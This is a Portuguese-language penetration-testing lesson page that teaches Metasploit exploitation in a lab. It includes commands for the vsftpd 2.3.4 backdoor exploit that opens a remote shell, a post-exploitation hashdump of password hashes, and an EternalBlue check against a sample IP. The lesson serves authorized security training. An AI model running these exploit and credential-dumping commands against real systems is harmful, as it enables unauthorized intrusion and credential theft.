Exploração de uma Vulnerabilidade Conhecida
Use um módulo de exploit contra um alvo vulnerável em um laboratório; interprete a saída da sessão.
Exploração de uma Vulnerabilidade Conhecida é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 2 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.
Ética e autorização em primeiro lugar
A exploração só é legal contra sistemas que pertencem a você ou para os quais tenha autorização explícita e por escrito para realizar testes. Todos os exemplos aqui destinam-se a ambientes de laboratório autorizados. A exploração não autorizada é uma infração criminal.
Recomendação para configuração do laboratório
Use máquinas virtuais intencionalmente vulneráveis: Metasploitable2/3, DVWA, máquinas do VulnHub ou HackTheBox/TryHackMe para praticar legalmente. Nunca faça testes em sistemas de produção ou do mundo real sem um documento de escopo assinado.
# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/
# Or use VulnHub
# https://www.vulnhub.com/
# Network: host-only adapter (isolated)Reconhecimento antes da exploração
Faça sempre a enumeração antes da exploração. Conheça a versão exata do serviço, o OS e o contexto antes de selecionar uma exploração. Versão incorreta = exploração malsucedida ou falha do sistema.
sudo nmap -sV -O 192.168.1.100
# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploitSelecionando a exploração correta
Pesquise pelo nome e pela versão do serviço. Prefira módulos classificados como Excellent ou Great. Leia o info para confirmar se a plataforma de destino e o intervalo de versões correspondem.
msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent
msf6 > info exploit/unix/ftp/vsftpd_234_backdoorConfigurando e executando a exploração
Defina RHOSTS (destino remoto), LHOST (seu IP para conexões reversas), LPORT (porta de escuta), selecione uma carga útil e execute. Observe a criação de uma sessão ou as mensagens de erro.
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run
# [*] Command shell session 1 openedInterpretando os resultados
Uma exploração bem-sucedida abre uma sessão. Explorações malsucedidas exibem mensagens de erro: conexão recusada (a porta não está aberta), exploração malsucedida (versão incorreta), nenhuma sessão criada (a carga útil não conseguiu estabelecer a conexão de retorno).
# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened
# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was createdInteragindo com uma sessão
Após a exploração, interaja com a sessão usando sessions -i . As sessões básicas de console de comandos fornecem um terminal; as sessões do Meterpreter oferecem uma API abrangente.
msf6 > sessions # list all sessions
msf6 > sessions -i 1 # interact with session 1
# Once inside:
id
whoami
ifconfig
uname -aColocando sessões em segundo plano e gerenciando várias sessões
Pressione Ctrl+Z para colocar uma sessão em segundo plano e retornar ao msfconsole. Isso permite gerenciar várias sessões ou executar módulos de pós-exploração em uma sessão específica.
# Background active session
Ctrl+Z
# List sessions
msf6 > sessions
# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > runComando de verificação
Muitos módulos de exploração implementam um comando check que testa se o destino é vulnerável sem realmente explorá-lo. Sempre execute a verificação primeiro, quando disponível.
msf6 exploit(ms17_010_eternalblue) > check
# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.Considerações sobre a confiabilidade das explorações
As explorações podem interromper serviços, disparar alertas ou deixar registros. Em avaliações de produção: programe as explorações para períodos de baixo tráfego, tenha um plano de reversão e confirme a existência de cópias de segurança antes de executar qualquer ação destrutiva.
Documentando a exploração
Registre: data e hora, IP e porta do destino, módulo de exploração usado, número do CVE, carga útil usada, sessão obtida e evidências (captura de tela ou saída do terminal). Essa é a prova da vulnerabilidade para o relatório.
Verificação rápida
O que o comando "check" do Metasploit faz?
Resumo: explorando vulnerabilidades
A exploração ética segue um fluxo claro: obtenha autorização por escrito, faça a enumeração com cuidado, selecione a exploração correspondente, leia as informações do módulo, execute a verificação primeiro quando disponível, prossiga com a execução e documente tudo. Nunca faça uma exploração sem autorização — a habilidade técnica e o limite ético são inseparáveis.
Aprenda Cyber Security Academy com um tutor de IA — grátis
Escreva e execute código real no seu navegador, obtenha ajuda instantânea de um tutor de IA 24/7 e continue de onde parou na web ou no app.
- Cursos
- 76
- Aulas
- 303
Perguntas Frequentes
A aula “Exploração de uma Vulnerabilidade Conhecida” é grátis?
Sim — o texto completo de “Exploração de uma Vulnerabilidade Conhecida” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.
O que vou aprender em “Exploração de uma Vulnerabilidade Conhecida”?
Use um módulo de exploit contra um alvo vulnerável em um laboratório; interprete a saída da sessão. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Cyber Security Academy?
Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 2 de 4.
Quanto tempo leva a aula “Exploração de uma Vulnerabilidade Conhecida”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Cyber Security Academy?
Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Arquitetura do Metasploit e msfconsole
- Exploração de uma Vulnerabilidade Conhecida
- Cargas: em Estágios ou sem Estágios, Meterpreter
- Pós-Exploração: Pivotar e Persistir